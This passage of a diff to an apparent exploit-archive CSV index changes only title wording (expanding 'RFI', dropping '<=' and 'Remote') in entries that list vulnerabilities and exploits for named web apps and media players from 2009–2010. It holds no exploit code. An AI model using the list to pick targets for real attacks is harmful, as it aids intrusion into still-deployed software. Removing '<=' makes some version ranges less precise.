Remote shell upload",2009-12-24,RENO,php,webapps,0 -10648,platforms/php/webapps/10648.txt,"cms -db <= 0.7.13 - Multiple Vulnerabilities",2009-12-25,"cp77fk4r ",php,webapps,0 +10648,platforms/php/webapps/10648.txt,"cms -db 0.7.13 - Multiple Vulnerabilities",2009-12-25,"cp77fk4r ",php,webapps,0 10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0 10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - (.asx) Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 - (.asx) Buffer Overflow PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 -10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 - RFI",2009-12-25,indoushka,php,webapps,0 +10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 - Remote File Inclusion",2009-12-25,indoushka,php,webapps,0 10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10655,platforms/php/webapps/10655.txt,"Best Top List Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 @@ -9899,47 +9899,47 @@ id,file,description,date,author,platform,type,port 14158,platforms/windows/local/14158.pl,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.m3u) Buffer Overflow",2010-07-01,Madjix,windows,local,0 10677,platforms/php/webapps/10677.txt,"PHPShop 0.6 - Bypass",2009-12-26,indoushka,php,webapps,0 10679,platforms/php/webapps/10679.txt,"Quiz - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 -10680,platforms/php/webapps/10680.txt,"E-Pay - RFI",2009-12-26,indoushka,php,webapps,0 +10680,platforms/php/webapps/10680.txt,"E-Pay - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10681,platforms/php/webapps/10681.txt,"Saibal Download Area 2.0 - Upload Shell",2009-12-26,indoushka,php,webapps,0 -10682,platforms/php/webapps/10682.txt,"Dros - RFI",2009-12-26,indoushka,php,webapps,0 +10682,platforms/php/webapps/10682.txt,"Dros - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10683,platforms/php/webapps/10683.txt,"TomatoCart - Backup",2009-12-26,indoushka,php,webapps,0 10684,platforms/php/webapps/10684.txt,"Upload-Point 1.6 Beta - Upload Shell",2009-12-26,indoushka,php,webapps,0 10685,platforms/php/webapps/10685.txt,"Best Top List 2.11 - Upload Shell",2009-12-26,indoushka,php,webapps,0 10686,platforms/asp/webapps/10686.txt,"CactuShop 6.0 - Database Disclosure",2009-12-26,LionTurk,asp,webapps,0 -10687,platforms/php/webapps/10687.txt,"SaphpLesson 4.0 food - RFI",2009-12-26,indoushka,php,webapps,0 +10687,platforms/php/webapps/10687.txt,"SaphpLesson 4.0 food - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10688,platforms/php/webapps/10688.txt,"FlatPress Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10689,platforms/php/webapps/10689.txt,"file upload Ar Version - Upload Shell",2009-12-26,indoushka,php,webapps,0 10690,platforms/php/webapps/10690.txt,"IMG2ASCII - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10691,platforms/php/webapps/10691.txt,"EZPX My photoblog 1.2 - Upload Shell",2009-12-26,indoushka,php,webapps,0 10692,platforms/php/webapps/10692.txt,"FreeForum 1.7 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 -10693,platforms/php/webapps/10693.txt,"FreeForum 1.7 - RFI",2009-12-26,indoushka,php,webapps,0 +10693,platforms/php/webapps/10693.txt,"FreeForum 1.7 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10694,platforms/php/webapps/10694.txt,"ES Simple Uploader 1.1 - Upload Shell",2009-12-26,indoushka,php,webapps,0 10695,platforms/php/webapps/10695.txt,"Lizard Cart - Upload Shell",2009-12-26,indoushka,php,webapps,0 10696,platforms/php/webapps/10696.txt,"epay Backup",2009-12-26,indoushka,php,webapps,0 -10697,platforms/php/webapps/10697.txt,"e-pay 1.55 - RFI",2009-12-26,indoushka,php,webapps,0 +10697,platforms/php/webapps/10697.txt,"e-pay 1.55 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10698,platforms/php/webapps/10698.txt,"e-cart 3.0 - Multiple Vulnerabilities",2009-12-26,indoushka,php,webapps,0 10699,platforms/php/webapps/10699.txt,"dB Masters Multimedia Insecure Cookie Handling",2009-12-26,indoushka,php,webapps,0 10700,platforms/php/webapps/10700.txt,"Image File Upload Upload Shell",2009-12-26,indoushka,php,webapps,0 -10701,platforms/php/webapps/10701.txt,"HowMany 2.6 - RFI",2009-12-26,indoushka,php,webapps,0 +10701,platforms/php/webapps/10701.txt,"HowMany 2.6 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10703,platforms/php/webapps/10703.txt,"kooora 3.0 - AR Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10704,platforms/php/webapps/10704.txt,"Mega Upload 1.45 - Upload Shell",2009-12-26,indoushka,php,webapps,0 -10705,platforms/php/webapps/10705.txt,"Gallery 2.3 - RFI",2009-12-26,indoushka,php,webapps,0 +10705,platforms/php/webapps/10705.txt,"Gallery 2.3 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10706,platforms/php/webapps/10706.txt,"MyCart shopping cart - Upload Shell",2009-12-26,indoushka,php,webapps,0 -10707,platforms/php/webapps/10707.txt,"osCommerce <= 2.2rc2a - Bypass/Create and Download Backup",2009-12-26,indoushka,php,webapps,0 +10707,platforms/php/webapps/10707.txt,"osCommerce 2.2rc2a - Bypass/Create and Download Backup",2009-12-26,indoushka,php,webapps,0 10708,platforms/php/webapps/10708.txt,"MyShoutPro 1.2 Final - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10710,platforms/php/webapps/10710.txt,"Green Desktiny Customer Support Helpdesk 2.3.1 - SQL Injection",2009-12-26,kaMtiEz,php,webapps,0 10711,platforms/php/webapps/10711.txt,"PHPAUCTION Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 -10712,platforms/php/webapps/10712.txt,"Nuked-Klan SP4 - RFI",2009-12-26,indoushka,php,webapps,0 +10712,platforms/php/webapps/10712.txt,"Nuked-Klan SP4 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter Database Disclosure",2009-12-26,LionTurk,asp,webapps,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager (OmniInet.exe) Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 - (event.php id) SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 -10717,platforms/php/webapps/10717.txt,"DBHCMS Web Content Management System 1.1.4 - RFI",2009-12-26,Gamoscu,php,webapps,0 +10717,platforms/php/webapps/10717.txt,"DBHCMS Web Content Management System 1.1.4 - Remote File Inclusion",2009-12-26,Gamoscu,php,webapps,0 10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script (Arabic Version) - Upload Shell",2009-12-26,indoushka,php,webapps,0 10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Upload Shell",2009-12-26,indoushka,php,webapps,0 10720,platforms/php/webapps/10720.txt,"PHP Football 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 -10721,platforms/php/webapps/10721.txt,"Nuked-Klan 1.7.7 - RFI",2009-12-26,indoushka,php,webapps,0 +10721,platforms/php/webapps/10721.txt,"Nuked-Klan 1.7.7 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10722,platforms/php/webapps/10722.txt,"PHP Uploader Downloader 2.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 -10725,platforms/php/webapps/10725.txt,"Nuke Remote SQL Injection",2009-12-27,FormatXformat,php,webapps,0 +10725,platforms/php/webapps/10725.txt,"Nuke SQL Injection",2009-12-27,FormatXformat,php,webapps,0 10726,platforms/php/webapps/10726.txt,"Info Fisier 1.0 - SQL Injection",2009-12-27,"AnGrY BoY",php,webapps,0 10727,platforms/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Remote File Upload",2009-12-27,Phenom,php,webapps,0 10728,platforms/php/webapps/10728.txt,"info fisier 1.0 - Multiple Vulnerabilities",2009-12-27,kaozc9,php,webapps,0 @@ -9966,7 +9966,7 @@ id,file,description,date,author,platform,type,port 10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0 10752,platforms/multiple/webapps/10752.txt,"Yonja Remote File Upload",2009-12-28,indoushka,multiple,webapps,80 10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Upload shell",2009-12-28,indoushka,multiple,webapps,80 -10754,platforms/multiple/webapps/10754.txt,"Joomla Component com_if_nexus Remote File Include",2009-12-28,FL0RiX,multiple,webapps,80 +10754,platforms/multiple/webapps/10754.txt,"Joomla Component com_if_nexus Remote File Inclusion",2009-12-28,FL0RiX,multiple,webapps,80 10755,platforms/linux/webapps/10755.txt,"egegen turkish script SQL Injection",2009-12-28,FormatXformat,linux,webapps,80 10756,platforms/linux/webapps/10756.txt,"MySimpleFileUploader 1.6 - Upload Shell",2009-12-28,FormatXformat,linux,webapps,80 10757,platforms/linux/webapps/10757.txt,"PHP Forum ohne My SQL Remote File Upload",2009-12-28,"wlhaan hacker",linux,webapps,80 @@ -9988,7 +9988,7 @@ id,file,description,date,author,platform,type,port 10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - DB Download",2009-12-29,indoushka,asp,webapps,0 10779,platforms/php/webapps/10779.txt,"DirectAdmin 1.34.0 - CSRF Create Administrator",2009-12-29,SecurityRules,php,webapps,0 10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog - DB Download",2009-12-29,indoushka,asp,webapps,0 -10781,platforms/php/webapps/10781.txt,"ActiveKB - RFI",2009-12-29,indoushka,php,webapps,0 +10781,platforms/php/webapps/10781.txt,"ActiveKB - Remote File Inclusion",2009-12-29,indoushka,php,webapps,0 10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - (.pls) Universal BoF (Perl)",2009-12-29,jacky,windows,local,0 10784,platforms/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection",2009-12-29,R3VAN_BASTARD,php,webapps,0 10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal BoF (Python)",2009-12-29,jacky,windows,local,0 @@ -9998,7 +9998,7 @@ id,file,description,date,author,platform,type,port 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection",2009-12-29,Pyske,php,webapps,0 10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80 -10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 - (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0 +10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0 10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 10796,platforms/asp/webapps/10796.txt,"ezscheduler Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0 @@ -10006,7 +10006,7 @@ id,file,description,date,author,platform,type,port 10798,platforms/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup",2009-12-30,indoushka,php,webapps,0 10800,platforms/php/webapps/10800.txt,"I-RATER Basic Shell Upload",2009-12-30,indoushka,php,webapps,0 10802,platforms/php/webapps/10802.txt,"PicMe 2.1.0 - Upload Shell",2009-12-30,indoushka,php,webapps,0 -10803,platforms/php/webapps/10803.txt,"UBB Threads 6.0 - RFI",2009-12-30,indoushka,php,webapps,0 +10803,platforms/php/webapps/10803.txt,"UBB Threads 6.0 - Remote File Inclusion",2009-12-30,indoushka,php,webapps,0 10805,platforms/php/webapps/10805.txt,"diesel job site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps,0 10806,platforms/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - XSS",2009-12-30,MaXe,php,webapps,0 10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 - (detail.php) SQL Injection",2009-12-30,Palyo34,php,webapps,0 @@ -10019,52 +10019,52 @@ id,file,description,date,author,platform,type,port 10816,platforms/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross-Site Scripting",2009-12-30,indoushka,php,webapps,0 10817,platforms/php/webapps/10817.txt,"Joomla Component com_airmonoblock Blind SQL Injection",2009-12-30,Pyske,php,webapps,0 10819,platforms/asp/webapps/10819.txt,"gallery_show.asp - GID Blind SQL Injection",2009-12-30,R3d-D3V!L,asp,webapps,0 -10820,platforms/php/dos/10820.sh,"Joomla Core <= 1.5.x com_component - DoS (0Day)",2009-12-31,emgent,php,dos,80 +10820,platforms/php/dos/10820.sh,"Joomla Core 1.5.x com_component - DoS (0Day)",2009-12-31,emgent,php,dos,80 10821,platforms/multiple/webapps/10821.txt,"WingFTP Server 3.2.4 - CSRF",2009-12-30,Ams,multiple,webapps,0 10822,platforms/php/webapps/10822.txt,"Joomla Component com_rd_download Local File Disclosure",2009-12-30,FL0RiX,php,webapps,0 10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure",2009-12-30,LionTurk,asp,webapps,0 10824,platforms/php/webapps/10824.txt,"K-Rate SQL Injection",2009-12-30,e.wiZz,php,webapps,0 -10825,platforms/php/dos/10825.sh,"WordPress <= 2.9 - DoS (0Day)",2009-12-31,emgent,php,dos,80 -10826,platforms/php/dos/10826.sh,"Drupal <= 6.16 / 5.21 - DoS (0Day)",2009-12-31,emgent,php,dos,80 +10825,platforms/php/dos/10825.sh,"WordPress 2.9 - DoS (0Day)",2009-12-31,emgent,php,dos,80 +10826,platforms/php/dos/10826.sh,"Drupal 6.16 / 5.21 - DoS (0Day)",2009-12-31,emgent,php,dos,80 10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - (bnnr.php) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10829,platforms/php/dos/10829.pl,"vBulletin Denial of Service",2009-12-30,R3d-D3V!L,php,dos,0 -10830,platforms/php/webapps/10830.txt,"Azadi Network (page) Remote SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10830,platforms/php/webapps/10830.txt,"Azadi Network (page) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange php (Auth Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 php (Auth Bypass) SQL Injection Vulnerabilit",2009-12-30,"Hussin X",php,webapps,0 -10833,platforms/php/webapps/10833.txt,"Classifieds Script (type) Remote SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10834,platforms/php/webapps/10834.txt,"Link Trader (lnkid) Remote SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10833,platforms/php/webapps/10833.txt,"Classifieds Script (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10834,platforms/php/webapps/10834.txt,"Link Trader (lnkid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0 -10836,platforms/php/webapps/10836.txt,"elkagroup (pid) Remote SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10837,platforms/php/webapps/10837.txt,"Quick Poll (code.php id) Remote SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10838,platforms/php/webapps/10838.txt,"list Web (addlink.php id) Remote SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip (store_info.php id) Remote SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10836,platforms/php/webapps/10836.txt,"elkagroup (pid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10837,platforms/php/webapps/10837.txt,"Quick Poll (code.php id) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10838,platforms/php/webapps/10838.txt,"list Web (addlink.php id) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip (store_info.php id) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 - (.asx) Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0 -10841,platforms/php/webapps/10841.pl,"pL-PHP <= beta 0.9 - Local File Include Exploit",2009-12-31,"cr4wl3r ",php,webapps,0 +10841,platforms/php/webapps/10841.pl,"pL-PHP beta 0.9 - Local File Inclusion Exploit",2009-12-31,"cr4wl3r ",php,webapps,0 10842,platforms/windows/dos/10842.py,"SimplePlayer 0.2 - (.wav) Overflow DoS Exploit (0Day)",2009-12-31,mr_me,windows,dos,0 10844,platforms/php/webapps/10844.txt,"Joomla Component com_portfol SQL Injection",2009-12-31,"wlhaan hacker",php,webapps,0 10845,platforms/php/webapps/10845.txt,"fileNice php file browser - RFI / LFI Vulnerabilities",2009-12-31,e.wiZz,php,webapps,0 10846,platforms/php/webapps/10846.txt,"Weatimages Directory Traversal and LFI Vulnerabilities",2009-12-31,e.wiZz,php,webapps,0 10847,platforms/php/webapps/10847.txt,"Joomla Component com_mdigg SQL Injection",2009-12-31,"wlhaan hacker",php,webapps,0 10850,platforms/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection",2009-12-31,bnc,php,webapps,0 -10861,platforms/php/webapps/10861.txt,"Discuz <= 1.03 SQL Injection Exploit",2009-12-31,indoushka,php,webapps,0 +10861,platforms/php/webapps/10861.txt,"Discuz 1.03 SQL Injection Exploit",2009-12-31,indoushka,php,webapps,0 10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) LFI",2009-12-31,cOndemned,php,webapps,0 10870,platforms/multiple/dos/10870.html,"Opera 10.10 Status Bar Obfuscation",2009-12-31,"599eme Man",multiple,dos,0 10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games (Auth Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10872,platforms/php/webapps/10872.txt,"Pre ADS Portal (cid) Remote SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10872,platforms/php/webapps/10872.txt,"Pre ADS Portal (cid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10873,platforms/php/webapps/10873.txt,"Myiosoft EasyGallery (catid) Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10874,platforms/php/webapps/10874.txt,"Pre News Manager (nid) Remote SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10874,platforms/php/webapps/10874.txt,"Pre News Manager (nid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10877,platforms/php/webapps/10877.txt,"php-addressbook 3.1.5 - (edit.php) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps,0 10879,platforms/windows/dos/10879.html,"Google Chrome 3.0195.38 Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos,0 -10880,platforms/php/webapps/10880.php,"bbScript <= 1.1.2.1 - (id) Blind SQL Injection Exploit",2009-12-31,cOndemned,php,webapps,0 +10880,platforms/php/webapps/10880.php,"bbScript 1.1.2.1 - (id) Blind SQL Injection Exploit",2009-12-31,cOndemned,php,webapps,0 10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 - (.aap) BoF DoS",2009-12-31,jacky,windows,dos,0 10882,platforms/php/webapps/10882.txt,"Kayako eSupport 3.04.10 - XSS/CSRF Vulnerabilities",2009-12-31,"D3V!L FUCKER",php,webapps,0 10883,platforms/asp/webapps/10883.txt,"BlogWorx 1.0 Blog Database Disclosure",2010-01-01,LionTurk,asp,webapps,0 10884,platforms/asp/webapps/10884.txt,"ArticleLive (blogs.php?Id) 1.7.1.2 - SQL Injection",2010-01-01,BAYBORA,asp,webapps,0 10885,platforms/php/webapps/10885.txt,"Cype CMS SQL Injection",2010-01-01,Sora,php,webapps,0 -10889,platforms/php/webapps/10889.txt,"DS CMS 1.0 - (NewsId) Remote SQL Injection",2010-01-01,Palyo34,php,webapps,0 +10889,platforms/php/webapps/10889.txt,"DS CMS 1.0 - (NewsId) SQL Injection",2010-01-01,Palyo34,php,webapps,0 10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps,0 10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0 10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - (downloads.php?cat) SQL Injection",2010-01-01,Gamoscu,php,webapps,0 @@ -10073,7 +10073,7 @@ id,file,description,date,author,platform,type,port 10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0 10904,platforms/windows/dos/10904.pl,"Switch Sound File Converter .mpga BoF DoS",2010-01-01,jacky,windows,dos,0 10905,platforms/php/webapps/10905.txt,"Joomla Component com_avosbillets Blind SQL Injection",2010-01-01,Pyske,php,webapps,0 -10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse suffer from auth bypass Remote SQL Injection",2010-01-02,R3d-D3V!L,php,webapps,0 +10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse suffer from auth bypass SQL Injection",2010-01-02,R3d-D3V!L,php,webapps,0 10907,platforms/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial of Services PoC",2010-01-02,SarBoT511,windows,dos,0 10908,platforms/windows/dos/10908.pl,"GOM player 2.1.9 - Local Crash PoC",2010-01-02,SarBoT511,windows,dos,0 10909,platforms/windows/dos/10909.pl,"MP4 Player 4.0 - Local Crash PoC",2010-01-02,SarBoT511,windows,dos,0 @@ -10082,7 +10082,7 @@ id,file,description,date,author,platform,type,port 10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script Cookie Handling",2010-01-02,DigitALL,php,webapps,0 10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - (.m3u) Exploit (0Day)",2010-01-02,"fl0 fl0w",windows,dos,0 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic ",php,webapps,0 -10923,platforms/php/webapps/10923.txt,"superlink script <= 1.0 - (id) SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 +10923,platforms/php/webapps/10923.txt,"superlink script 1.0 - (id) SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 10924,platforms/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,php,webapps,0 10928,platforms/php/webapps/10928.txt,"Joomla Component com_dailymeals LFI",2010-01-02,FL0RiX,php,webapps,0 10929,platforms/php/webapps/10929.txt,"WordPress Events Plugin - SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 @@ -10103,23 +10103,23 @@ id,file,description,date,author,platform,type,port 10950,platforms/php/webapps/10950.txt,"Joomla Component com_tpjobs Blind SQL Injection",2010-01-03,FL0RiX,php,webapps,0 10952,platforms/php/webapps/10952.txt,"Joomla Component com_alfresco SQL Injection",2010-01-03,FL0RiX,php,webapps,0 10953,platforms/php/webapps/10953.txt,"Joomla Component com_hotbrackets Blind SQL Injection",2010-01-03,FL0RiX,php,webapps,0 -10955,platforms/asp/webapps/10955.txt,"MasterWeb Script <= 1.0 - (details&newsID) SQL Injection",2010-01-03,Red-D3v1L,asp,webapps,0 +10955,platforms/asp/webapps/10955.txt,"MasterWeb Script 1.0 - (details&newsID) SQL Injection",2010-01-03,Red-D3v1L,asp,webapps,0 10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 DoS PoC",2010-01-03,anonymous,multiple,dos,0 10962,platforms/php/webapps/10962.txt,"Live TV Script SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10964,platforms/php/webapps/10964.txt,"Joomla Bridge of Hope Template SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10965,platforms/php/webapps/10965.txt,"Joomla Component com_doqment (cid) SQL Injection",2010-01-03,Gamoscu,php,webapps,0 10966,platforms/php/webapps/10966.txt,"Joomla Component com_otzivi Blind SQL Injection",2010-01-03,Cyber_945,php,webapps,0 -10967,platforms/php/webapps/10967.txt,"Rezervi <= 3.0.2 - (mail.inc.php) RFI",2010-01-03,r00t.h4x0r,php,webapps,0 -10968,platforms/php/webapps/10968.txt,"portal modulnet <= 1.0 - (id) SQL Injection",2010-01-03,Red-D3v1L,php,webapps,0 +10967,platforms/php/webapps/10967.txt,"Rezervi 3.0.2 - (mail.inc.php) Remote File Inclusion",2010-01-03,r00t.h4x0r,php,webapps,0 +10968,platforms/php/webapps/10968.txt,"portal modulnet 1.0 - (id) SQL Injection",2010-01-03,Red-D3v1L,php,webapps,0 10971,platforms/php/webapps/10971.txt,"Joomla Bamboo Simpla Admin Template SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0 10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit (2)",2010-01-03,DouBle_Zer0,windows,remote,0 -10974,platforms/php/webapps/10974.txt,"Simple Portal <= 2.0 - Auth Bypass",2010-01-03,Red-D3v1L,php,webapps,0 +10974,platforms/php/webapps/10974.txt,"Simple Portal 2.0 - Auth Bypass",2010-01-03,Red-D3v1L,php,webapps,0 10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop (productdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 10977,platforms/php/webapps/10977.txt,"Smart Vsion Script News (newsdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 10978,platforms/php/webapps/10978.txt,"Elite Gaming Ladders 3.0 - SQL Injection Exploit",2010-01-03,Sora,php,webapps,0 10979,platforms/php/webapps/10979.txt,"Joomla component com_oziogallery2 - / IMAGIN arbitrary file write",2010-01-03,"Ubik and er",php,webapps,0 -10980,platforms/linux/remote/10980.txt,"Skype for Linux <= 2.1 Beta - Multiple Strange Behavior",2010-01-04,emgent,linux,remote,0 +10980,platforms/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behavior",2010-01-04,emgent,linux,remote,0 10981,platforms/php/webapps/10981.pl,"Smart Vision Script News (newsdetail) SQL Injection Exploit",2010-01-04,darkmasking,php,webapps,0 10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 & 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 10984,platforms/php/webapps/10984.txt,"Joomla component com_cartikads 1.0 - Remote File Upload",2010-01-04,kaMtiEz,php,webapps,0 @@ -10150,7 +10150,7 @@ id,file,description,date,author,platform,type,port 11026,platforms/php/webapps/11026.php,"com_jembed (catid) Blind SQL Injection Exploit",2010-01-06,FL0RiX,php,webapps,0 11027,platforms/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 RTSP BoF (Perl)",2010-01-06,jacky,windows,remote,0 11028,platforms/php/webapps/11028.txt,"Docebo 3.6.0.2 (stable) - Local File Inclusion",2010-01-06,"Zer0 Thunder",php,webapps,0 -11029,platforms/multiple/local/11029.txt,"DirectAdmin <= 1.33.6 Symlink Permission Bypass",2010-01-06,alnjm33,multiple,local,0 +11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 Symlink Permission Bypass",2010-01-06,alnjm33,multiple,local,0 11030,platforms/hardware/webapps/11030.txt,"D-LINK DKVM-IP8 - XSS",2010-01-06,POPCORN,hardware,webapps,0 11031,platforms/php/webapps/11031.txt,"Milonic News (viewnews) SQL Injection",2010-01-06,Err0R,php,webapps,0 11033,platforms/php/webapps/11033.txt,"Joomla Component com_kk Blind SQL Injection",2010-01-06,Pyske,php,webapps,0 @@ -10158,7 +10158,7 @@ id,file,description,date,author,platform,type,port 11035,platforms/php/webapps/11035.txt,"Joomla Component com_king Blind SQL Injection",2010-01-06,Pyske,php,webapps,0 11036,platforms/php/webapps/11036.txt,"RoundCube Webmail Multiple Vulerabilities",2010-01-06,"j4ck and Globus",php,webapps,0 11043,platforms/hardware/dos/11043.txt,"Total Multimedia Features - DoS PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 -11044,platforms/linux/dos/11044.txt,"Gnome Panel <= 2.28.0 - Denial of Service PoC (0Day)",2010-01-06,"Pietro 